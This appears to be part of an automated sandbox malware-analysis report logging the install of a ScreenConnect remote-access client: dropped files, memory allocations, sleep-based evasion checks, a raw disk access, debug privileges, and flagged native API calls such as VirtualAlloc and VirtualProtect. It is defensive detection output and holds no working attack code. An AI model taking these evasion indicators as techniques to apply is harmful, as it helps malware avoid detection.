Source: C:\Windows\SysWOW64\rundll32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\ScreenConnect Client (3a24aebb8959bcfa)\ScreenConnect.ClientService.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\ScreenConnect Client (3a24aebb8959bcfa)\ScreenConnect.ClientService.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\ScreenConnect Client (3a24aebb8959bcfa)\ScreenConnect.ClientService.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\ScreenConnect Client (3a24aebb8959bcfa)\ScreenConnect.ClientService.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\ScreenConnect Client (3a24aebb8959bcfa)\ScreenConnect.ClientService.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\ScreenConnect Client (3a24aebb8959bcfa)\ScreenConnect.ClientService.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\ScreenConnect Client (3a24aebb8959bcfa)\ScreenConnect.ClientService.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\ScreenConnect Client (3a24aebb8959bcfa)\ScreenConnect.ClientService.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\ScreenConnect Client (3a24aebb8959bcfa)\ScreenConnect.ClientService.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\ScreenConnect Client (3a24aebb8959bcfa)\ScreenConnect.ClientService.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\ScreenConnect Client (3a24aebb8959bcfa)\ScreenConnect.ClientService.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\ScreenConnect Client (3a24aebb8959bcfa)\ScreenConnect.ClientService.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\ScreenConnect Client (3a24aebb8959bcfa)\ScreenConnect.ClientService.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\ScreenConnect Client (3a24aebb8959bcfa)\ScreenConnect.ClientService.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\ScreenConnect Client (3a24aebb8959bcfa)\ScreenConnect.ClientService.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\ScreenConnect Client (3a24aebb8959bcfa)\ScreenConnect.ClientService.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\ScreenConnect Client (3a24aebb8959bcfa)\ScreenConnect.ClientService.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\ScreenConnect Client (3a24aebb8959bcfa)\ScreenConnect.ClientService.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\ScreenConnect Client (3a24aebb8959bcfa)\ScreenConnect.ClientService.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\ScreenConnect Client (3a24aebb8959bcfa)\ScreenConnect.ClientService.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\ScreenConnect Client (3a24aebb8959bcfa)\ScreenConnect.ClientService.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\ScreenConnect Client (3a24aebb8959bcfa)\ScreenConnect.ClientService.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\ScreenConnect Client (3a24aebb8959bcfa)\ScreenConnect.ClientService.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\ScreenConnect Client (3a24aebb8959bcfa)\ScreenConnect.ClientService.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\ScreenConnect Client (3a24aebb8959bcfa)\ScreenConnect.ClientService.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\ScreenConnect Client (3a24aebb8959bcfa)\ScreenConnect.ClientService.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\ScreenConnect Client (3a24aebb8959bcfa)\ScreenConnect.ClientService.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\ScreenConnect Client (3a24aebb8959bcfa)\ScreenConnect.ClientService.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\ScreenConnect Client (3a24aebb8959bcfa)\ScreenConnect.ClientService.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\ScreenConnect Client (3a24aebb8959bcfa)\ScreenConnect.ClientService.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\ScreenConnect Client (3a24aebb8959bcfa)\ScreenConnect.ClientService.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\ScreenConnect Client (3a24aebb8959bcfa)\ScreenConnect.ClientService.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\ScreenConnect Client (3a24aebb8959bcfa)\ScreenConnect.ClientService.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\ScreenConnect Client (3a24aebb8959bcfa)\ScreenConnect.ClientService.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\ScreenConnect Client (3a24aebb8959bcfa)\ScreenConnect.ClientService.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\ScreenConnect Client (3a24aebb8959bcfa)\ScreenConnect.ClientService.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\ScreenConnect Client (3a24aebb8959bcfa)\ScreenConnect.ClientService.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\ScreenConnect Client (3a24aebb8959bcfa)\ScreenConnect.ClientService.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\ScreenConnect Client (3a24aebb8959bcfa)\ScreenConnect.ClientService.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\ScreenConnect Client (3a24aebb8959bcfa)\ScreenConnect.ClientService.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\ScreenConnect Client (3a24aebb8959bcfa)\ScreenConnect.ClientService.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\ScreenConnect Client (3a24aebb8959bcfa)\ScreenConnect.ClientService.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\ScreenConnect Client (3a24aebb8959bcfa)\ScreenConnect.ClientService.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\ScreenConnect Client (3a24aebb8959bcfa)\ScreenConnect.ClientService.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\ScreenConnect Client (3a24aebb8959bcfa)\ScreenConnect.ClientService.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\ScreenConnect Client (3a24aebb8959bcfa)\ScreenConnect.ClientService.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\ScreenConnect Client (3a24aebb8959bcfa)\ScreenConnect.ClientService.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\ScreenConnect Client (3a24aebb8959bcfa)\ScreenConnect.ClientService.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\ScreenConnect Client (3a24aebb8959bcfa)\ScreenConnect.ClientService.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\ScreenConnect Client (3a24aebb8959bcfa)\ScreenConnect.ClientService.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\ScreenConnect Client (3a24aebb8959bcfa)\ScreenConnect.ClientService.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\ScreenConnect Client (3a24aebb8959bcfa)\ScreenConnect.ClientService.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\ScreenConnect Client (3a24aebb8959bcfa)\ScreenConnect.ClientService.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\ScreenConnect Client (3a24aebb8959bcfa)\ScreenConnect.ClientService.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\ScreenConnect Client (3a24aebb8959bcfa)\ScreenConnect.ClientService.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\ScreenConnect Client (3a24aebb8959bcfa)\ScreenConnect.ClientService.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\ScreenConnect Client (3a24aebb8959bcfa)\ScreenConnect.ClientService.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\ScreenConnect Client (3a24aebb8959bcfa)\ScreenConnect.ClientService.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\ScreenConnect Client (3a24aebb8959bcfa)\ScreenConnect.ClientService.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\ScreenConnect Client (3a24aebb8959bcfa)\ScreenConnect.ClientService.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\ScreenConnect Client (3a24aebb8959bcfa)\ScreenConnect.ClientService.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\ScreenConnect Client (3a24aebb8959bcfa)\ScreenConnect.ClientService.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\ScreenConnect Client (3a24aebb8959bcfa)\ScreenConnect.ClientService.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\ScreenConnect Client (3a24aebb8959bcfa)\ScreenConnect.ClientService.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\ScreenConnect Client (3a24aebb8959bcfa)\ScreenConnect.WindowsClient.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\ScreenConnect Client (3a24aebb8959bcfa)\ScreenConnect.WindowsClient.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\ScreenConnect Client (3a24aebb8959bcfa)\ScreenConnect.WindowsClient.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\ScreenConnect Client (3a24aebb8959bcfa)\ScreenConnect.WindowsClient.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\ScreenConnect Client (3a24aebb8959bcfa)\ScreenConnect.WindowsClient.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\ScreenConnect Client (3a24aebb8959bcfa)\ScreenConnect.WindowsClient.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\ScreenConnect Client (3a24aebb8959bcfa)\ScreenConnect.WindowsClient.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\ScreenConnect Client (3a24aebb8959bcfa)\ScreenConnect.WindowsClient.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\ScreenConnect Client (3a24aebb8959bcfa)\ScreenConnect.WindowsClient.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\ScreenConnect Client (3a24aebb8959bcfa)\ScreenConnect.WindowsClient.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\ScreenConnect Client (3a24aebb8959bcfa)\ScreenConnect.WindowsClient.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\ScreenConnect Client (3a24aebb8959bcfa)\ScreenConnect.WindowsClient.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\ScreenConnect Client (3a24aebb8959bcfa)\ScreenConnect.WindowsClient.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\ScreenConnect Client (3a24aebb8959bcfa)\ScreenConnect.WindowsClient.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\ScreenConnect Client (3a24aebb8959bcfa)\ScreenConnect.WindowsClient.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\ScreenConnect Client (3a24aebb8959bcfa)\ScreenConnect.WindowsClient.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\ScreenConnect Client (3a24aebb8959bcfa)\ScreenConnect.WindowsClient.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\ScreenConnect Client (3a24aebb8959bcfa)\ScreenConnect.WindowsClient.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\ScreenConnect Client (3a24aebb8959bcfa)\ScreenConnect.WindowsClient.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\ScreenConnect Client (3a24aebb8959bcfa)\ScreenConnect.WindowsClient.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\ScreenConnect Client (3a24aebb8959bcfa)\ScreenConnect.WindowsClient.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\ScreenConnect Client (3a24aebb8959bcfa)\ScreenConnect.WindowsClient.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\ScreenConnect Client (3a24aebb8959bcfa)\ScreenConnect.WindowsClient.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\ScreenConnect Client (3a24aebb8959bcfa)\ScreenConnect.WindowsClient.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\ScreenConnect Client (3a24aebb8959bcfa)\ScreenConnect.WindowsClient.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\ScreenConnect Client (3a24aebb8959bcfa)\ScreenConnect.WindowsClient.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\ScreenConnect Client (3a24aebb8959bcfa)\ScreenConnect.WindowsClient.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\ScreenConnect Client (3a24aebb8959bcfa)\ScreenConnect.WindowsClient.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\ScreenConnect Client (3a24aebb8959bcfa)\ScreenConnect.WindowsClient.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\ScreenConnect Client (3a24aebb8959bcfa)\ScreenConnect.WindowsClient.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\ScreenConnect Client (3a24aebb8959bcfa)\ScreenConnect.WindowsClient.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\ScreenConnect Client (3a24aebb8959bcfa)\ScreenConnect.WindowsClient.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\ScreenConnect Client (3a24aebb8959bcfa)\ScreenConnect.WindowsClient.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\ScreenConnect Client (3a24aebb8959bcfa)\ScreenConnect.WindowsClient.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\ScreenConnect Client (3a24aebb8959bcfa)\ScreenConnect.WindowsClient.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\ScreenConnect Client (3a24aebb8959bcfa)\ScreenConnect.WindowsClient.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\ScreenConnect Client (3a24aebb8959bcfa)\ScreenConnect.WindowsClient.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\ScreenConnect Client (3a24aebb8959bcfa)\ScreenConnect.WindowsClient.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\ScreenConnect Client (3a24aebb8959bcfa)\ScreenConnect.WindowsClient.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\ScreenConnect Client (3a24aebb8959bcfa)\ScreenConnect.WindowsClient.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\ScreenConnect Client (3a24aebb8959bcfa)\ScreenConnect.WindowsClient.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\ScreenConnect Client (3a24aebb8959bcfa)\ScreenConnect.WindowsClient.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\ScreenConnect Client (3a24aebb8959bcfa)\ScreenConnect.WindowsClient.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\ScreenConnect Client (3a24aebb8959bcfa)\ScreenConnect.WindowsClient.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\ScreenConnect Client (3a24aebb8959bcfa)\ScreenConnect.WindowsClient.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\ScreenConnect Client (3a24aebb8959bcfa)\ScreenConnect.WindowsClient.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\ScreenConnect Client (3a24aebb8959bcfa)\ScreenConnect.WindowsClient.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\ScreenConnect Client (3a24aebb8959bcfa)\ScreenConnect.WindowsClient.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\ScreenConnect Client (3a24aebb8959bcfa)\ScreenConnect.WindowsClient.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\ScreenConnect Client (3a24aebb8959bcfa)\ScreenConnect.WindowsClient.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\ScreenConnect Client (3a24aebb8959bcfa)\ScreenConnect.WindowsClient.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\ScreenConnect Client (3a24aebb8959bcfa)\ScreenConnect.WindowsClient.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\ScreenConnect Client (3a24aebb8959bcfa)\ScreenConnect.WindowsClient.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\ScreenConnect Client (3a24aebb8959bcfa)\ScreenConnect.WindowsClient.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\ScreenConnect Client (3a24aebb8959bcfa)\ScreenConnect.WindowsClient.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\ScreenConnect Client (3a24aebb8959bcfa)\ScreenConnect.WindowsClient.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior

Source: C:\Program Files (x86)\ScreenConnect Client (3a24aebb8959bcfa)\ScreenConnect.ClientService.exe	Memory allocated: 1870000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Program Files (x86)\ScreenConnect Client (3a24aebb8959bcfa)\ScreenConnect.ClientService.exe	Memory allocated: 1FA0000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Program Files (x86)\ScreenConnect Client (3a24aebb8959bcfa)\ScreenConnect.ClientService.exe	Memory allocated: 1DF0000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Program Files (x86)\ScreenConnect Client (3a24aebb8959bcfa)\ScreenConnect.WindowsClient.exe	Memory allocated: 980000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Program Files (x86)\ScreenConnect Client (3a24aebb8959bcfa)\ScreenConnect.WindowsClient.exe	Memory allocated: 1A380000 memory reserve \| memory write watch	Jump to behavior

Source: C:\Windows\System32\msiexec.exe	Dropped PE file which has not been started: C:\Program Files (x86)\ScreenConnect Client (3a24aebb8959bcfa)\ScreenConnect.Core.dll	Jump to dropped file
Source: C:\Windows\System32\msiexec.exe	Dropped PE file which has not been started: C:\Program Files (x86)\ScreenConnect Client (3a24aebb8959bcfa)\ScreenConnect.ClientService.dll	Jump to dropped file
Source: C:\Windows\SysWOW64\rundll32.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\MSIBC6.tmp-\ScreenConnect.Windows.dll	Jump to dropped file
Source: C:\Windows\SysWOW64\rundll32.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\MSIBC6.tmp-\Microsoft.Deployment.WindowsInstaller.Package.dll	Jump to dropped file
Source: C:\Windows\SysWOW64\rundll32.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\MSIBC6.tmp-\ScreenConnect.InstallerActions.dll	Jump to dropped file
Source: C:\Windows\System32\msiexec.exe	Dropped PE file which has not been started: C:\Program Files (x86)\ScreenConnect Client (3a24aebb8959bcfa)\ScreenConnect.WindowsCredentialProvider.dll	Jump to dropped file
Source: C:\Windows\System32\msiexec.exe	Dropped PE file which has not been started: C:\Program Files (x86)\ScreenConnect Client (3a24aebb8959bcfa)\ScreenConnect.WindowsAuthenticationPackage.dll	Jump to dropped file
Source: C:\Windows\System32\msiexec.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\MSIBC6.tmp	Jump to dropped file
Source: C:\Windows\SysWOW64\rundll32.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\MSIBC6.tmp-\ScreenConnect.Core.dll	Jump to dropped file
Source: C:\Windows\System32\msiexec.exe	Dropped PE file which has not been started: C:\Program Files (x86)\ScreenConnect Client (3a24aebb8959bcfa)\ScreenConnect.WindowsBackstageShell.exe	Jump to dropped file
Source: C:\Windows\SysWOW64\rundll32.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\MSIBC6.tmp-\Microsoft.Deployment.Compression.dll	Jump to dropped file
Source: C:\Windows\System32\msiexec.exe	Dropped PE file which has not been started: C:\Program Files (x86)\ScreenConnect Client (3a24aebb8959bcfa)\ScreenConnect.Windows.dll	Jump to dropped file
Source: C:\Windows\System32\msiexec.exe	Dropped PE file which has not been started: C:\Program Files (x86)\ScreenConnect Client (3a24aebb8959bcfa)\ScreenConnect.Client.dll	Jump to dropped file
Source: C:\Windows\System32\msiexec.exe	Dropped PE file which has not been started: C:\Program Files (x86)\ScreenConnect Client (3a24aebb8959bcfa)\ScreenConnect.WindowsFileManager.exe	Jump to dropped file
Source: C:\Windows\SysWOW64\rundll32.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\MSIBC6.tmp-\Microsoft.Deployment.Compression.Cab.dll	Jump to dropped file
Source: C:\Windows\SysWOW64\rundll32.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\MSIBC6.tmp-\Microsoft.Deployment.WindowsInstaller.dll	Jump to dropped file
Source: C:\Windows\System32\msiexec.exe	Dropped PE file which has not been started: C:\Windows\Installer\MSI1608.tmp	Jump to dropped file
Source: C:\Windows\System32\msiexec.exe	Dropped PE file which has not been started: C:\Windows\Installer\MSI17AE.tmp	Jump to dropped file

Source: C:\Program Files (x86)\ScreenConnect Client (3a24aebb8959bcfa)\ScreenConnect.ClientService.exe TID: 7696	Thread sleep count: 40 > 30	Jump to behavior
Source: C:\Program Files (x86)\ScreenConnect Client (3a24aebb8959bcfa)\ScreenConnect.ClientService.exe TID: 7936	Thread sleep time: -30000s >= -30000s	Jump to behavior
Source: C:\Windows\System32\svchost.exe TID: 7888	Thread sleep time: -30000s >= -30000s	Jump to behavior

Source: C:\Windows\System32\svchost.exe

File opened: PhysicalDrive0

Source: C:\Windows\System32\msiexec.exe	File Volume queried: C:\ FullSizeInformation	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	File Volume queried: C:\ FullSizeInformation	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	File Volume queried: C:\ FullSizeInformation	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	File Volume queried: C:\ FullSizeInformation	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	File Volume queried: C:\ FullSizeInformation	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	File Volume queried: C:\ FullSizeInformation	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	File Volume queried: C:\ FullSizeInformation	Jump to behavior

Source: svchost.exe, 00000008.00000002.2942015906.0000017F93258000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000008.00000002.2940590686.0000017F8DC2B000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW
Source: ScreenConnect.ClientService.exe, 00000006.00000002.2948001083.0000000005508000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll

Source: C:\Windows\System32\msiexec.exe

Process information queried: ProcessInformation

Source: C:\Program Files (x86)\ScreenConnect Client (3a24aebb8959bcfa)\ScreenConnect.ClientService.exe

Process token adjusted: Debug

Source: C:\Windows\SysWOW64\rundll32.exe

Memory allocated: page read and write | page guard

.NET source code references suspicious native API functions

HIPS / PFW / Operating System Protection Evasion

Source: ScreenConnect.ClientService.dll.1.dr, ClientService.cs	Reference to suspicious API methods: WindowsExtensions.OpenProcess(processID, (ProcessAccess)33554432)
Source: ScreenConnect.Windows.dll.1.dr, WindowsMemoryNativeLibrary.cs	Reference to suspicious API methods: WindowsNative.VirtualAlloc(attemptImageBase, dwSize, WindowsNative.MEM.MEM_COMMIT \| WindowsNative.MEM.MEM_RESERVE, WindowsNative.PAGE.PAGE_READWRITE)
Source: ScreenConnect.Windows.dll.1.dr, WindowsMemoryNativeLibrary.cs	Reference to suspicious API methods: WindowsNative.LoadLibrary(loadedImageBase + ptr[i].Name)
Source: ScreenConnect.Windows.dll.1.dr, WindowsMemoryNativeLibrary.cs	Reference to suspicious API methods: WindowsNative.GetProcAddress(intPtr, ptr5)
Source: ScreenConnect.Windows.dll.1.dr, WindowsMemoryNativeLibrary.cs	Reference to suspicious API methods: WindowsNative.VirtualProtect(loadedImageBase + sectionHeaders[i].VirtualAddress, (IntPtr)num, flNewProtect, &pAGE)

Source: unknown

